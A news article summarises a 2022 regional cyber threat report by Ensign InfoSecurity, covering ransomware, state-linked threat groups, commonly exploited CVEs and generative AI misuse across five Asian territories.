Its 2022 user base data from five countries in the region shows a need for stronger oversight of AI ethics frameworks.
According to a cybersecurity firm’s Cyber Threat Landscape report for 2022, including those affecting Singapore, Malaysia, Indonesia, South Korea, and Hong Kong, there was much evolution and proliferation in the use of ransomware and wiperware as cyber weapon platforms.
Going by its own user base data, the year also saw the continued impact of cyber supply chain compromise due to large-scale, deployed components which were vulnerable and led to the compromise of several big-name victim companies, commonly leading to ransomware and data sale from breaches.
Threat actors also exploited IoT devices, mobile devices, applications and operational technology last year. Also, Ransomware-as-a-Service as model saw a shift in the number of attacks targeting small- and medium- sized enterprises (SMEs), many of which could be essential service providers.
Other findings
Regionally, according to the firm’s user base data, activities by state-sponsored and organized threat groups originating from China had eclipsed those of state-sponsored groups operating from Russia and North Korea. Also:
- Generative AI was a double-edged sword, with the data showing threat actors exploiting it to create convincing phishing content with 10–15% higher click-through rates; develop malware faster, and circumvent authentication and identity verifications by synthetically generating imagery and voice representations.
- Cyber defenders were also leveraging generative AI and other forms of AI to enhance their own efficiency and effectiveness to accelerate the resolution of low-level cyberattacks, freeing up defenders to focus on more complex issues.
- Regional threats and trends:
-
Indonesia: The top two exploited vulnerabilities in the firm’s user base were CVE-2017-0199 (Arbitrary Code Execution on Microsoft Office 2007 to 2016 and Windows Vista SP2 to Windows 8.1 and Windows Server 2008 SP2) and CVE-2006-1540 (Denial of Service and Arbitrary Code Execution on Microsoft Office 2000 to 2003).
The Government, Financial Services, Insurance (FSI), and Commercial industry groups were the top industries targeted by threat actors. With the series of cyberattacks performed by the Desorden threat group, the Commercial industry group was significantly battered. Many of these attacks were contributed by organized crime group attacks through data breaches and ransomware attacks, notably on SMEs in the cyber supply chain leading to the newsworthy incidents
-
Hong Kong: The firm’s SAR users saw sustained cyberattacks from menuPass and Operation Dragon Castling threat groups, a state-sponsored threat group and an organized crime threat group respectively — both associated with China.
In the context of cryptocurrency exchanges, for which Hong Kong is an emerging hub, the cryptocurrencies are attractive to financially motivated threat groups targeting weaknesses in the cryptocurrency services infrastructure and wallets to steal cryptocurrency or to support money laundering.
-
Malaysia: The highest exploited vulnerabilities were fairly consistent with the top vulnerabilities observed from the firm’s data in 2021 and 2013. This may indicate that threat actors were leveraging the Malaysia digital attack surface to testbed the vulnerabilities before using them at scale at more mature territories. The continued focused exploitation attempts on CVE-2021-44228, the Apache Log4j arbitrary code execution vulnerability, indicate that the threat actors were seeing a higher return on investments for exploiting this vulnerability. This suggests that organizations in Malaysia are still playing catch-up in patching the vulnerabilities which are now more than a year old.
-
Singapore: The highest exploited vulnerabilities were not necessarily the latest published vulnerabilities or zero days exploits but vulnerabilities dating as far back as 2006. This indicates that threat actors were still optimistic in finding old, unpatched vulnerabilities to compromise for higher return-on-investment, demonstrating the poor cyber hygiene in victim organizations. The avoidance of more current vulnerabilities may point towards the assumption that patch management frequencies were generally higher in Singapore compared to the rest of the region due to compliance and regulations.
The Healthcare and Transport industries in the country rose into the top targeted industries, together with the Oil and Gas sector.
-
South Korea: The country saw sustained cyberattacks from North Korea-based threat groups. In 2022, Roaming Mantis started compromising domestic Wi-Fi routers and Android smartphone users to create opportunities for surveillance and data exfiltration.
Of the threat groups, Kimsuky, Lazarus Group and were material threat groups demonstrating the three elements of Intent, Capability and Opportunity. Kimsuky and its affiliate, Lazarus Group, have been known to target South Korea, and have been observed to leverage domestic software vulnerabilities, phishing campaigns and Ransomware to compromise their victims.
Exploitation of CVE-2021-44228, an Apache Log4j arbitrary code execution vulnerability, indicates that threat actors were still seeing some utility and return on investments in exploiting it in South Korea. Also, old vulnerabilities related to Microsoft productivity solutions and operating systems were being targeted.
-
According to Lim Minhan, Head of Consulting, Ensign InfoSecurity, the firm that released the cyber threat report: “While threat actors are rapidly advancing and becoming highly sophisticated in their techniques, we have observed an overall lack of cybersecurity awareness across organizations in Asia. With AI-powered attacks generating new pathways, (there was) a drastic uptick in threats across the territories featured in our report. Policy and regulation, along with a strong ethical framework for AI, will go a long way in casting a security net for nations at large, and organizations in particular.”